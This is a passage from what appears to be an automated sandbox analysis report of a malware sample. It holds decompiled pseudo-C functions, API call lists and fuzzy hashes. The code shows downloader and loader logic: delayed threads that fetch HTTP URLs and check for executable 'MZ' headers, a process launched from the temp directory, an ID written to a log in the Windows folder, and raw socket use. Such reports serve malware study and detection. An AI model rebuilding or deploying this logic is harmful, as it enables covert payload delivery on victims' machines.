                                						_v528 = GlobalAlloc(0x40, _v532 + 0x400);
                                						ReadFile(_v536, _v528, _v532,  &_v544, 0);
                                						 *0x21e1148( &_v524, "C:\\Windows\\lvgdvj.log");
                                						E022042EC( &_v524,  *0x21e114c( &_v264),  &_v524);
                                						E022043C5(_v528, _v532,  &_v264);
                                						_t75 = _t75 + 0x18;
                                						_v540 = 1;
                                					}
                                					_t58 = _v536;
                                					_t40 = CloseHandle(_v536);
                                				}
                                				_t82 = _v540;
                                				if(_v540 != 0) {
                                					_t40 = E02206330(_t58, _t82, _v528, 1);
                                				}
                                				if(_v528 != 0) {
                                					return GlobalFree(_v528);
                                				}
                                				return _t40;
                                			}















                                0x022055c8
                                0x022055d2
                                0x022055dc
                                0x022055e6
                                0x022055f0
                                0x02205604
                                0x02205606
                                0x02205607
                                0x0220561b
                                0x0220561b
                                0x0220561b
                                0x0220561d
                                0x0220561f
                                0x02205637
                                0x0220563d
                                0x0220564a
                                0x0220565f
                                0x0220566c
                                0x02205697
                                0x022056bb
                                0x022056cd
                                0x022056ef
                                0x0220570c
                                0x02205711
                                0x02205714
                                0x02205714
                                0x0220571e
                                0x02205725
                                0x02205725
                                0x0220572b
                                0x02205732
                                0x0220573d
                                0x02205742
                                0x0220574c
                                0x00000000
                                0x02205755
                                0x0220575f

                                APIs
                                • CreateFileA.KERNELBASE(C:\Windows\lvgdvj.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02205637
                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 02205659
                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 02205691
                                • ReadFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 022056BB
                                • lstrcpy.KERNEL32(00000000,C:\Windows\lvgdvj.log), ref: 022056CD
                                • lstrlen.KERNEL32(00000000,00000000), ref: 022056E1
                                • CloseHandle.KERNEL32(000000FF), ref: 02205725
                                • GlobalFree.KERNEL32(00000000), ref: 02205755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$Global$AllocCloseCreateFreeHandleReadSizelstrcpylstrlen
                                • String ID: C:\Windows\lvgdvj.log
                                • API String ID: 1499523542-2229539412
                                • Opcode ID: 9c8835725e25ee7de6e355932671bf722bd1be44d6294684624417e57f330c75
                                • Instruction ID: 41a3e55123167a6c271ac6dc15f8538632e90a6bbb19c0e3492accb428dc0951
                                • Opcode Fuzzy Hash: 9c8835725e25ee7de6e355932671bf722bd1be44d6294684624417e57f330c75
                                • Instruction Fuzzy Hash: 94415FB5D90318EBDB20DBA4CC8CBDAB7B8AB54704F1046D4E21DA61D1D7B45AD4CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 49%
                                			E0220A553() {
                                				void _v263;
                                				char _v264;
                                				void _v391;
                                				char _v392;
                                				signed int _v396;
                                				CHAR* _t27;
                                				CHAR* _t28;
                                				signed int _t34;
                                				CHAR* _t37;
                                				CHAR* _t49;
                                				CHAR* _t50;
                                				CHAR* _t53;
                                				CHAR* _t54;
                                
                                				_v396 = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v392 = 0;
                                				memset( &_v391, 0, 0x1f << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				 *0x22190c0 = GetTickCount();
                                				_t27 =  *0x21e17e8; // 0x22026c0
                                				_t50 =  *0x21e17c0; // 0x2202660
                                				_t28 =  *0x21e168c; // 0x2202114
                                				GetPrivateProfileStringA(_t28, _t50, 0,  &_v392, 0x80, _t27); // executed
                                				_t46 =  &_v392;
                                				_push( &_v392);
                                				if( *0x21e114c() == 0) {
                                					 *0x22194d4 = 1;
                                					_v396 = GetTickCount();
                                					if(_v396 < 0) {
                                						_v396 = _v396 * 0xffffffff;
                                					}
                                					_t34 = E022044CB(_t46);
                                					asm("cdq");
                                					_t37 =  *0x21e16c8; // 0x22022b4
                                					wsprintfA( &_v392, _t37, _v396, (_t34 & 0x0000ffff) % 0x2710);
                                					_t53 =  *0x21e17e8; // 0x22026c0
                                					_t49 =  *0x21e17c0; // 0x2202660
                                					_t54 =  *0x21e168c; // 0x2202114
                                					WritePrivateProfileStringA(_t54, _t49,  &_v392, _t53); // executed
                                				}
                                				return  *0x21e1148("59814062956",  &_v392);
                                			}
















                                0x0220a55d
                                0x0220a567
                                0x0220a57b
                                0x0220a57d
                                0x0220a57f
                                0x0220a580
                                0x0220a594
                                0x0220a596
                                0x0220a598
                                0x0220a59f
                                0x0220a5a4
                                0x0220a5b8
                                0x0220a5bf
                                0x0220a5c5
                                0x0220a5cb
                                0x0220a5d1
                                0x0220a5da
                                0x0220a5e0
                                0x0220a5f0
                                0x0220a5fd
                                0x0220a608
                                0x0220a608
                                0x0220a60e
                                0x0220a618
                                0x0220a628
                                0x0220a635
                                0x0220a63e
                                0x0220a64c
                                0x0220a653
                                0x0220a65a
                                0x0220a65a
                                0x0220a676

                                APIs
                                • GetTickCount.KERNEL32 ref: 0220A599
                                • GetPrivateProfileStringA.KERNEL32(02202114,02202660,00000000,00000000,00000080,022026C0), ref: 0220A5C5
                                • lstrlen.KERNEL32(00000000), ref: 0220A5D2
                                • GetTickCount.KERNEL32 ref: 0220A5EA
                                • wsprintfA.USER32 ref: 0220A635
                                • WritePrivateProfileStringA.KERNEL32(02202114,02202660,?,022026C0), ref: 0220A65A
                                • lstrcpy.KERNEL32(59814062956,00000000), ref: 0220A66C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
                                • String ID: 59814062956
                                • API String ID: 929466507-284605625
                                • Opcode ID: 98c7b9ede1ba252ca6f7de85a86a7c2c2b4b59c06384f9603c541d391316e13a
                                • Instruction ID: e064095bbbdc9b17f88f4e26324ff8cae9e56cd325c4e925df2ceeff330614d1
                                • Opcode Fuzzy Hash: 98c7b9ede1ba252ca6f7de85a86a7c2c2b4b59c06384f9603c541d391316e13a
                                • Instruction Fuzzy Hash: B8314BB2940218FBDF14CBA8DC55BE7B7F9EB48700F408998E2099B280DE705ED48F50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 69%
                                			E02208962(void* __eflags) {
                                				signed int _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				void _v1051;
                                				char _v1052;
                                				signed int _v1056;
                                				signed int _v1060;
                                				signed int _v1064;
                                				char _v2085;
                                				char _v2086;
                                				void _v2087;
                                				char _v2088;
                                				signed int _v3368;
                                				signed int _v3375;
                                				void _v3376;
                                				char _v3380;
                                				int _v3384;
                                				signed int _v3388;
                                				signed int _t99;
                                				intOrPtr _t106;
                                				int _t129;
                                				signed int _t131;
                                				signed int _t148;
                                				signed int _t152;
                                				intOrPtr _t156;
                                				intOrPtr _t162;
                                				intOrPtr _t164;
                                				intOrPtr _t166;
                                				intOrPtr _t187;
                                				intOrPtr _t189;
                                				void* _t204;
                                				intOrPtr _t205;
                                				intOrPtr _t206;
                                				void* _t209;
                                				void* _t218;
                                
                                				_push(0xffffffff);
                                				_push(0x2203fb8);
                                				_push(0x2218090);
                                				_push( *[fs:0x0]);
                                				 *[fs:0x0] = _t205;
                                				_t206 = _t205 + 0xfffff2d8;
                                				_v28 = _t206;
                                				_v1052 = 0;
                                				memset( &_v1051, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v2088 = 0;
                                				memset( &_v2087, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v3380 = 0;
                                				memset( &_v3376, 0, 0x142 << 2);
                                				_t209 = _t206 + 0x24;
                                				_v1056 = 2;
                                				_v1064 = 0;
                                				_v1060 = 0;
                                				_v3388 = 0;
                                				_v3384 = 0;
                                				_v8 = 0;
                                				Sleep(0x2bf20); // executed
                                				_t99 = E022044CB(0);
                                				asm("cdq");
                                				Sleep((_t99 & 0x0000ffff) % 0x7530 + 0x400); // executed
                                				while(1 != 0) {
                                					_v3388 = 0;
                                					if( *0x22882b0 != 0 &&  *0x22882b4 != 0) {
                                						_t106 =  *0x22882b0; // 0x0
                                						_t218 = _t106 -  *0x2287da0; // 0x54
                                						if(_t218 == 0) {
                                							_v1056 = 0x110;
                                							_t156 =  *0x22882b4; // 0x0
                                							_v1064 =  *((intOrPtr*)(_t156 + 0x10c));
                                							if(_v1064 > 0 && _v1064 < 0xa) {
                                								_v1060 = 0;
                                								while(_v1060 != _v1064) {
                                									_t187 =  *0x22882b4; // 0x0
                                									_v3384 =  *((intOrPtr*)(_t187 + _v1056));
                                									_v1056 = _v1056 + 4;
                                									_t189 =  *0x22882b4; // 0x0
                                									if( *((char*)(_t189 + _v1056)) == 0x4d) {
                                										_t162 =  *0x22882b4; // 0x0
                                										if( *((char*)(_t162 + _v1056 + 1)) == 0x5a) {
                                											_t164 =  *0x22882b4; // 0x0
                                											if(IsBadHugeWritePtr(_t164 + _v1056, _v3384) == 0) {
                                												E0220A75A( &_v1052);
                                												_t166 =  *0x22882b4; // 0x0
                                												E022045D2( &_v1052, _t166 + _v1056, _v3384);
                                												E02204631( &_v1052);
                                												_t209 = _t209 + 0x14;
                                												Sleep(0x1770);
                                											}
                                										}
                                									}
                                									_v1056 = _v1056 + _v3384;
                                									_v1060 = _v1060 + 1;
                                								}
                                							}
                                						}
                                					}
                                					Sleep(0x1d4c0);
                                					E0221772B( &_v3380, 0x2287da0, 0x50c);
                                					_t209 = _t209 + 0xc;
                                					_v1056 = 2;
                                					_v1060 = 0;
                                					_v1064 = _v1060;
                                					while(1) {
                                						__eflags = _v1060 - (_v3368 & 0x000000ff);
                                						if(_v1060 >= (_v3368 & 0x000000ff)) {
                                							break;
                                						}
                                						__eflags = _v3375 & 0x000000ff;
                                						if((_v3375 & 0x000000ff) == 0) {
                                							L25:
                                							_v1064 = _v1056;
                                							while(1) {
                                								__eflags = 0;
                                								if(0 == 0) {
                                									break;
                                								}
                                								__eflags = _v1064 - _v1056 - 0x50;
                                								if(_v1064 - _v1056 < 0x50) {
                                									_t152 = _v1064 + 1;
                                									__eflags = _t152;
                                									_v1064 = _t152;
                                									continue;
                                								}
                                								break;
                                							}
                                							_v1064 = _v1064 + 1;
                                							 *0x21e1148( &_v2088, _t204 + _v1056 - 0xd24);
                                							__eflags = _v2088 - 0x68;
                                							if(_v2088 != 0x68) {
                                								L38:
                                							} else {
                                								__eflags = _v2087 - 0x74;
                                								if(_v2087 != 0x74) {
                                									goto L38;
                                								} else {
                                									__eflags = _v2086 - 0x74;
                                									if(_v2086 != 0x74) {
                                										goto L38;
                                									} else {
                                										__eflags = _v2085 - 0x70;
                                										if(_v2085 != 0x70) {
                                											goto L38;
                                										} else {
                                											E0220A75A( &_v1052);
                                											_t129 = E02210945(__eflags,  &_v2088,  &_v1052, 0, 0x7a120);
                                											_t209 = _t209 + 0x14;
                                											_v3384 = _t129;
                                											__eflags = _v3384;
                                											if(_v3384 != 0) {
                                												_t131 = E022114D9( &_v1052, _v3384);
                                												_t209 = _t209 + 8;
                                												__eflags = _t131;
                                												if(_t131 != 0) {
                                													_v3388 = 1;
                                												}
                                											}
                                											_v1056 = _v1064;
                                											_t148 = _v1060 + 1;
                                											__eflags = _t148;
                                											_v1060 = _t148;
                                											continue;
                                										}
                                									}
                                								}
                                							}
                                						} else {
                                							__eflags = (_v3375 & 0x000000ff) - 1;
                                							if((_v3375 & 0x000000ff) != 1) {
                                								L22:
                                								__eflags = (_v3375 & 0x000000ff) - 2;
                                								if((_v3375 & 0x000000ff) != 2) {
                                									goto L25;
                                								} else {
                                									__eflags =  *0x22194cc - 0xf42400;
                                									if( *0x22194cc <= 0xf42400) {
                                										goto L25;
                                									} else {
                                									}
                                								}
                                							} else {
                                								__eflags =  *0x22194cc - 0xf42400;
                                								if( *0x22194cc >= 0xf42400) {
                                									goto L22;
                                								} else {
                                								}
                                							}
                                						}
                                						break;
                                					}
                                					__eflags = 0;
                                					if(0 <= 0) {
                                						Sleep(0x1b7740);
                                					} else {
                                						Sleep(0);
                                					}
                                				}
                                				_v8 = 0xffffffff;
                                				_push(0);
                                				RtlExitUserThread();
                                				__eflags = 0;
                                				 *[fs:0x0] = _v20;
                                				return 0;
                                			}






































                                0x02208965
                                0x02208967
                                0x0220896c
                                0x02208977
                                0x02208978
                                0x0220897f
                                0x02208988
                                0x0220898b
                                0x0220899f
                                0x022089a1
                                0x022089a3
                                0x022089a4
                                0x022089b8
                                0x022089ba
                                0x022089bc
                                0x022089bd
                                0x022089d4
                                0x022089d4
                                0x022089d6
                                0x022089e0
                                0x022089ea
                                0x022089f4
                                0x022089fe
                                0x02208a08
                                0x02208a14
                                0x02208a1a
                                0x02208a24
                                0x02208a33
                                0x02208a39
                                0x02208a46
                                0x02208a57
                                0x02208a6a
                                0x02208a6f
                                0x02208a75
                                0x02208a7b
                                0x02208a85
                                0x02208a91
                                0x02208a9e
                                0x02208ab1
                                0x02208acc
                                0x02208ade
                                0x02208aec
                                0x02208afb
                                0x02208b01
                                0x02208b13
                                0x02208b15
                                0x02208b28
                                0x02208b31
                                0x02208b46
                                0x02208b4f
                                0x02208b5e
                                0x02208b72
                                0x02208b81
                                0x02208b86
                                0x02208b8e
                                0x02208b8e
                                0x02208b46
                                0x02208b28
                                0x02208ba0
                                0x02208ac6
                                0x02208ac6
                                0x02208acc
                                0x02208a9e
                                0x02208a75
                                0x02208bb0
                                0x02208bc7
                                0x02208bcc
                                0x02208bcf
                                0x02208bd9
                                0x02208be9
                                0x02208c00
                                0x02208c0c
                                0x02208c12
                                0x00000000
                                0x00000000
                                0x02208c23
                                0x02208c25
                                0x02208c6b
                                0x02208c71
                                0x02208c88
                                0x02208c97
                                0x02208c99
                                0x00000000
                                0x00000000
                                0x02208ca7
                                0x02208caa
                                0x02208c7f
                                0x02208c7f
                                0x02208c82
                                0x00000000
                                0x02208c82
                                0x00000000
                                0x02208caa
                                0x02208cb7
                                0x02208cd2
                                0x02208cdf
                                0x02208ce2
                                0x02208d6d
                                0x02208ce8
                                0x02208cef
                                0x02208cf2
                                0x00000000
                                0x02208cf4
                                0x02208cfb
                                0x02208cfe
                                0x00000000
                                0x02208d00
                                0x02208d07
                                0x02208d0a
                                0x00000000
                                0x02208d0c
                                0x02208d13
                                0x02208d30
                                0x02208d35
                                0x02208d38
                                0x02208d3e
                                0x02208d45
                                0x02208d55
                                0x02208d5a
                                0x02208d5d
                                0x02208d5f
                                0x02208d61
                                0x02208d61
                                0x02208d5f
                                0x02208d75
                                0x02208bf7
                                0x02208bf7
                                0x02208bfa
                                0x00000000
                                0x02208bfa
                                0x02208d0a
                                0x02208cfe
                                0x02208cf2
                                0x02208c27
                                0x02208c33
                                0x02208c36
                                0x02208c49
                                0x02208c55
                                0x02208c58
                                0x00000000
                                0x02208c5a
                                0x02208c5a
                                0x02208c64
                                0x00000000
                                0x00000000
                                0x02208c66
                                0x02208c64
                                0x02208c38
                                0x02208c38
                                0x02208c42
                                0x00000000
                                0x00000000
                                0x02208c44
                                0x02208c42
                                0x02208c36
                                0x00000000
                                0x02208c25
                                0x02208d89
                                0x02208d8b
                                0x02208daa
                                0x02208d8d
                                0x02208d9d
                                0x02208d9d
                                0x02208db0
                                0x02208db5
                                0x02208dce
                                0x02208dd0
                                0x02208dd6
                                0x02208ddb
                                0x02208de8

                                APIs
                                • Sleep.KERNELBASE(0002BF20), ref: 02208A14
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • Sleep.KERNELBASE ref: 02208A33
                                • IsBadHugeWritePtr.KERNEL32(00000110,00000000), ref: 02208B3E
                                • Sleep.KERNEL32(00001770), ref: 02208B8E
                                • Sleep.KERNEL32(0001D4C0), ref: 02208BB0
                                • Sleep.KERNEL32(0048001E), ref: 02208D9D
                                • RtlExitUserThread.NTDLL(00000000), ref: 02208DD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleep$ExchangeExitHugeInterlockedThreadUserWrite
                                • String ID:
                                • API String ID: 3415417386-0
                                • Opcode ID: ebf03c33e24adf7ee444e9dd2cd7fe9dec2353c053cd32abd2d32ba8430cf068
                                • Instruction ID: fbe13a3f8993dec643492dc9874c9048a84458a2d1efa096208da1a3cdedeba3
                                • Opcode Fuzzy Hash: ebf03c33e24adf7ee444e9dd2cd7fe9dec2353c053cd32abd2d32ba8430cf068
                                • Instruction Fuzzy Hash: 5CB1B1B0A51218CBDB24CBA0CCD47EAB7B5BF44304F4085E9E209A6286D7756ED4CF5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 60%
                                			E004014EB() {
                                				struct _PROCESS_INFORMATION _v20;
                                				struct _STARTUPINFOW _v88;
                                				short _v608;
                                				long _t29;
                                				signed int _t35;
                                				void* _t42;
                                
                                				_t35 = 0x11;
                                				memset( &_v88, 0, _t35 << 2);
                                				_v88.cb = 0x44;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v88.dwFlags = 1;
                                				_v88.wShowWindow = 5;
                                				GetTempPathW(0x104,  &_v608);
                                				if( *((short*)(_t42 + lstrlenW( &_v608) * 2 - 0x25e)) == 0x5c) {
                                					 *((short*)(_t42 + lstrlenW( &_v608) * 2 - 0x25e)) = 0;
                                				}
                                				CreateProcessW( &_v608, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
                                				_t29 = GetLastError();
                                				asm("sbb eax, eax");
                                				return  ~(_t29 - 5) + 1;
                                			}









                                0x004014fa
                                0x004014fe
                                0x00401503
                                0x0040150a
                                0x0040150b
                                0x0040150c
                                0x0040150d
                                0x00401514
                                0x00401521
                                0x00401527
                                0x00401547
                                0x00401552
                                0x00401552
                                0x00401570
                                0x00401576
                                0x00401582
                                0x00401587

                                APIs
                                • GetTempPathW.KERNEL32(00000104,?,?), ref: 00401527
                                • lstrlenW.KERNEL32(?), ref: 0040153A
                                • lstrlenW.KERNEL32(?), ref: 00401550
                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,004017DA), ref: 00401570
                                • GetLastError.KERNEL32 ref: 00401576
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: lstrlen$CreateErrorLastPathProcessTemp
                                • String ID: D$\
                                • API String ID: 3489217399-468123767
                                • Opcode ID: dc9c4cdb5cd2c179eff2efa93a4405172a76a7c619e023eed5e3e2870705a702
                                • Instruction ID: e41a149f76cc3bb6082800bb08762e11a74309c2223353c11ef59b11b956732b
                                • Opcode Fuzzy Hash: dc9c4cdb5cd2c179eff2efa93a4405172a76a7c619e023eed5e3e2870705a702
                                • Instruction Fuzzy Hash: 0201257280161CAEDF10DBE8DD4CADE77BCEB84301F104565D605F7150D6B45A49CB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 70%
                                			E0220878B() {
                                				void _v1027;
                                				char _v1028;
                                				void* _v1032;
                                				struct _SECURITY_ATTRIBUTES* _v1036;
                                				long _v1040;
                                				void* _t25;
                                				void* _t27;
                                				void* _t36;
                                				void* _t37;
                                
                                				_v1036 = 0;
                                				_v1040 = 0;
                                				_v1028 = 0;
                                				memset( &_v1027, 0, 0xff << 2);
                                				_t37 = _t36 + 0xc;
                                				_t30 = 0;
                                				asm("stosw");
                                				asm("stosb");
                                				_v1032 = 0;
                                				Sleep(0x493e0); // executed
                                				L1:
                                				while(1 != 0) {
                                					 *0x22194d0 = E02205C26();
                                					 *0x22194c8 = 0;
                                					_v1036 = 0;
                                					while(_v1036 < 0x3e7) {
                                						_t25 = E02205E12(_t30, _v1036);
                                						_t37 = _t37 + 4;
                                						_v1032 = _t25;
                                						if(_v1032 != 0) {
                                							_t27 = CreateThread(0, 0, E022084C1, _v1032, 0,  &_v1040); // executed
                                							E022041C6(_v1032, _t27, 0, 0);
                                							_t37 = _t37 + 0xc;
                                							Sleep(0x200); // executed
                                							while( *0x22194c8 > 7) {
                                								Sleep(0x100);
                                							}
                                							_t30 =  &(_v1036->nLength);
                                							_v1036 =  &(_v1036->nLength);
                                							continue;
                                						} else {
                                							L11:
                                							while( *0x22194c8 > 0) {
                                								Sleep(0x100);
                                							}
                                							if( *0x22194d0 > 0x1f4) {
                                								E02205CA4();
                                							}
                                							Sleep(0x400);
                                							E02205760(0);
                                							_t37 = _t37 + 4;
                                							E02208701(_t30);
                                							Sleep(0x249f00);
                                							goto L1;
                                						}
                                						goto L11;
                                					}
                                					goto L11;
                                				}
                                				_push(0);
                                				RtlExitUserThread();
                                				return 0;
                                			}












                                0x02208795
                                0x0220879f
                                0x022087a9
                                0x022087bd
                                0x022087bd
                                0x022087bd
                                0x022087bf
                                0x022087c1
                                0x022087c2
                                0x022087d1
                                0x00000000
                                0x022087d7
                                0x022087e9
                                0x022087ee
                                0x022087f8
                                0x02208813
                                0x02208826
                                0x0220882b
                                0x0220882e
                                0x0220883b
                                0x0220885c
                                0x02208863
                                0x02208868
                                0x02208870
                                0x02208876
                                0x02208884
                                0x02208884
                                0x0220880a
                                0x0220880d
                                0x00000000
                                0x0220883d
                                0x00000000
                                0x02208891
                                0x0220889f
                                0x0220889f
                                0x022088b1
                                0x022088b3
                                0x022088b3
                                0x022088bd
                                0x022088c5
                                0x022088ca
                                0x022088cd
                                0x022088d7
                                0x00000000
                                0x022088d7
                                0x00000000
                                0x0220883b
                                0x00000000
                                0x02208813
                                0x022088e2
                                0x022088e4
                                0x022088f0

                                APIs
                                • Sleep.KERNELBASE(000493E0), ref: 022087D1
                                • CreateThread.KERNELBASE(00000000,00000000,022084C1,00000000,00000000,00000000), ref: 0220885C
                                  • Part of subcall function 022041C6: RtlEnterCriticalSection.NTDLL(02219030), ref: 022041D6
                                  • Part of subcall function 022041C6: RtlLeaveCriticalSection.NTDLL(02219030), ref: 02204260
                                • Sleep.KERNELBASE(00000200), ref: 02208870
                                • Sleep.KERNEL32(00000100), ref: 02208884
                                • Sleep.KERNEL32(00000100), ref: 0220889F
                                • Sleep.KERNEL32(00000400), ref: 022088BD
                                • Sleep.KERNEL32(00249F00), ref: 022088D7
                                • RtlExitUserThread.NTDLL(00000000), ref: 022088E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleep$CriticalSectionThread$CreateEnterExitLeaveUser
                                • String ID:
                                • API String ID: 485722307-0
                                • Opcode ID: 1666a59be8620391741b15885e9b08bcd824d78d2d86792d3194cd6503ec80d2
                                • Instruction ID: 30f68777eb29f26aa6d8aee1342222e9c30ba941d38f95c6ca7b77edcab0e6b2
                                • Opcode Fuzzy Hash: 1666a59be8620391741b15885e9b08bcd824d78d2d86792d3194cd6503ec80d2
                                • Instruction Fuzzy Hash: B731B3B4DA4308EBEB509BE0DC89B9B76B4BB00305F4044A4E3097A1C6CBB549D4CF2B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 29%
                                			E0220719B(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                				char _v4208;
                                				char _v4213;
                                				char _v4214;
                                				char _v4215;
                                				char _v4216;
                                				char _v4217;
                                				char _v4218;
                                				char _v4219;
                                				char _v4223;
                                				char _v4224;
                                				signed int _v4226;
                                				void _v4227;
                                				signed int _v4228;
                                				char _v4232;
                                				char _v4236;
                                				signed int _v4240;
                                				signed int _v4244;
                                				char _v4504;
                                				signed int _v4508;
                                				char _v4512;
                                				intOrPtr _v4516;
                                				signed int _v4520;
                                				signed int _t95;
                                				void* _t98;
                                				signed int _t111;
                                				signed int _t142;
                                				void* _t164;
                                				void* _t165;
                                				void* _t166;
                                				void* _t167;
                                				void* _t168;
                                				void* _t169;
                                				void* _t170;
                                
                                				E02218060(0x11a4, __ecx);
                                				_v4228 = 0;
                                				memset( &_v4227, 0, 0x41f << 2);
                                				_t166 = _t165 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_v4244 = 0;
                                				_v4240 = 0;
                                				_v4236 = 0;
                                				_v4512 = 0;
                                				_v4508 = 0;
                                				_v4232 = 0;
                                				 *0x21e11b0(2, 2, 0x11); // executed
                                				_v4516 = 0;
                                				_t173 = _v4516 - 0xffffffff;
                                				if(_v4516 == 0xffffffff) {
                                					L33:
                                					if(_v4516 != 0xffffffff) {
                                						 *0x21e11f0(_v4516);
                                					}
                                					return _v4244;
                                				}
                                				asm("sbb ecx, ecx");
                                				_t95 = E02206981(( ~_a16 & 0x00000020) + 3, _t173,  &_v4228, ( ~_a16 & 0x00000020) + 3, 0, 0);
                                				_t167 = _t166 + 0x10;
                                				_v4240 = _t95;
                                				if(_v4240 == 0) {
                                					goto L33;
                                				}
                                				_t98 =  *0x21e11ac(_v4516,  &_v4228, _v4240, 0, _a4, 0x10); // executed
                                				if(_t98 != 0xffffffff) {
                                					_v4232 = 0x10;
                                					_v4512 = 0xf;
                                					_v4508 = 0;
                                					_v4504 = 0;
                                					do {
                                						_v4520 = 0;
                                						goto L6;
                                						L6:
                                						if(_v4520 >= _v4504 ||  *((intOrPtr*)(_t164 + _v4520 * 4 - 0x1190)) == _v4516) {
                                							if(_v4520 == _v4504 && _v4504 < 0x40) {
                                								 *((intOrPtr*)(_t164 + _v4520 * 4 - 0x1190)) = _v4516;
                                								_v4504 = _v4504 + 1;
                                							}
                                						} else {
                                							_t142 = _v4520 + 1;
                                							__eflags = _t142;
                                							_v4520 = _t142;
                                							goto L6;
                                						}
                                					} while (0 != 0);
                                					_push( &_v4512);
                                					_push(0);
                                					_push(0);
                                					_push( &_v4504);
                                					_push(_v4516 + 1);
                                					if( *0x21e11a8() > 0) {
                                						_v4240 =  *0x21e11c0(_v4516,  &_v4228, 0x1000, 0, _a4,  &_v4232);
                                						__eflags = _v4240 - 0xffffffff;
                                						if(_v4240 != 0xffffffff) {
                                							__eflags = _v4240 - 0x1000;
                                							if(_v4240 < 0x1000) {
                                								__eflags = _v4240;
                                								if(_v4240 > 0) {
                                									__eflags = (_v4226 & 0x0000ffff) - 0x1000;
                                									if((_v4226 & 0x0000ffff) < 0x1000) {
                                										_push(1);
                                										E022062DB( &_v4228, _v4226 & 0x0000ffff);
                                										_t168 = _t167 + 0xc;
                                										__eflags = _v4219 - 3;
                                										if(_v4219 == 3) {
                                											_t111 = E022040A6( &_v4224, _v4226);
                                											_t169 = _t168 + 8;
                                											__eflags = (_v4228 & 0x0000ffff) - (_t111 & 0x0000ffff);
